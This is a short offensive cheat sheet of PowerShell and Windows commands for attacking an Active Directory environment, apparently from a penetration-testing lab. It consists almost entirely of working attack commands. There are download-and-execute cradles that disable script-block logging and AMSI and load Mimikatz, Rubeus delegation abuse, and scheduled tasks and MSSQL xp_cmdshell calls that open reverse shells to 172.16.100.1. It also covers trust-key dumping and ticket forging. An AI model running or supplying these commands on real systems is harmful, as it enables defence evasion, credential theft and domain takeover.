PowerShell Scripts Memory Injection

iex(iwr <http://172.16.100.1/sbloggingbypass.txt> -UseBasicParsing);iex(iwr <http://172.16.100.1/amsibypass.txt> -UseBasicParsing);iex(iwr <http://172.16.100.1/Invoke-MimiEx.ps1> -UseBasicParsing)

Constrained Delegation

.\\Rubeus.exe s4u /user: /aes256: /impersonateuser:Administrator /msdsspn: /altservice:host /nowrap /ptt

Task Scheduling

schtasks /create /S finance-dc.finance.corp /SC Weekly /RU "finance\\Administrator" /TN "STCheck" /TR "powershell.exe -c 'iex(iwr <http://172.16.100.1/sbloggingbypass.txt> -UseBasicParsing);iex(iwr <http://172.16.100.1/amsibypass.txt> -UseBasicParsing);IEX(iwr <http://172.16.100.1/Invoke-PowerShellTcp.ps1> -UseBasicParsing)'"

Running Scheduled Task

schtasks /Run /S finance-dc.finance.corp /TN "STCheck"

Checking MSSQL Availability

Get-SQLInstanceDomain -Verbose

Checking MSSQL Access

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Crawling Database Links

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose

MSSQL Reverse Shell

Get-SQLServerLinkCrawl -Instance dbserver31 -Query 'exec master..xp_cmdshell ''powershell -c "iex(iwr <http://172.16.100.1/sbloggingbypass.txt> -UseBasicParsing);iex(iwr <http://172.16.100.1/amsibypass.txt> -UseBasicParsing);iex(iwr <http://172.16.100.1/Invoke-PowerShellTcp.ps1> -UseBasicParsing)"''' -QueryTarget dbserver31

Dumping Trust Keys

.\\BetterSafetyKatz.exe '"lsadump::trust /patch"' "exit"

Forging Ticket As Enterprise Administrator —> Sid is My Domain Sid —> Sids is the Forest Root Sid